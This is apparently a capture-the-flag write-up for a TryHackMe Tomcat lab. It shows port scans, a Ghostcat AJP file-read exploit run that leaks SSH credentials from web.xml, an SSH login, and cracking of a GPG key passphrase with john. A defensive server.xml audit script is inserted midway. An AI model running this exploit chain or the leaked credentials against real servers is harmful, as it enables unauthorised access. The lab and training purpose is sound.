```
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 60
53/tcp   open  domain     syn-ack ttl 60
8009/tcp open  ajp13      syn-ack ttl 60
8080/tcp open  http-proxy syn-ack ttl 60

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
           Raw packets sent: 8 (328B) | Rcvd: 5 (216B)
```
Further version detection
```
PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped syn-ack ttl 60
8009/tcp open  ajp13      syn-ack ttl 60 Apache Jserv (Protocol v1.3)
8080/tcp open  http       syn-ack ttl 60 Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
positional arguments:
  target                Hostname or IP to attack

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  AJP port to attack (default is 8009)
  -f FILE, --file FILE  file path :(WEB-INF/web.xml)
```
```
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.211.222
-----------------------------------
目标: 10.10.211.222
端口: 8009
文件:WEB-INF/web.xml
-----------------------------------
Getting resource at ajp13://10.10.211.222:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```
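The file read above succeeds because the AJP connector on 8009 is reachable from the network and demands no shared secret. As an added defensive check that is not part of this writeup, the script below audits a Tomcat server.xml for AJP connectors that lack the protections Tomcat made default from 9.0.31 (loopback binding and a required secret); both server.xml samples are constructed for the example, not taken from the target.

```python
import xml.etree.ElementTree as ET

# Constructed sample: AJP connector in the pre-9.0.31 style, listening on
# all interfaces with no shared secret. This is the shape Ghostcat
# (CNVD-2020-10487 / CVE-2020-1938) abuses.
WEAK_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed sample: same connector bound to loopback with a secret
# required, matching the defaults introduced in Tomcat 9.0.31.
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-LONG-RANDOM-SECRET" />
  </Service>
</Server>"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per weakness on each AJP connector in server.xml.

    Flags: connector reachable beyond loopback, secretRequired explicitly
    disabled, or no shared secret configured at all.
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        port = conn.get("port", "?")
        # Conservative assumption: a missing address means all interfaces,
        # which was the default before 9.0.31.
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            findings.append(f"AJP/{port}: bound to {address}, reachable beyond localhost")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f"AJP/{port}: secretRequired=false")
        if not conn.get("secret"):
            findings.append(f"AJP/{port}: no shared secret configured")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml_text) or ["no findings"])
```

Point the script at a real server.xml via `ET.parse` to audit a deployed instance; removing the AJP connector entirely is the simplest fix when no reverse proxy needs it.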
webshell
usershell
SSH login
```
skyfuck:8730281lkjlkjdqlksalks
```
```
skyfuck@ubuntu:~$ ls -la
total 40
drwxr-xr-x 3 skyfuck skyfuck 4096 Nov 16 00:44 .
drwxr-xr-x 4 root    root    4096 Mar 10  2020 ..
-rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10  2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 Nov 16 00:44 .cache
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
-rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc
```
```
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2024-11-16 03:55) 25.00g/s 26800p/s 26800c/s 26800C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```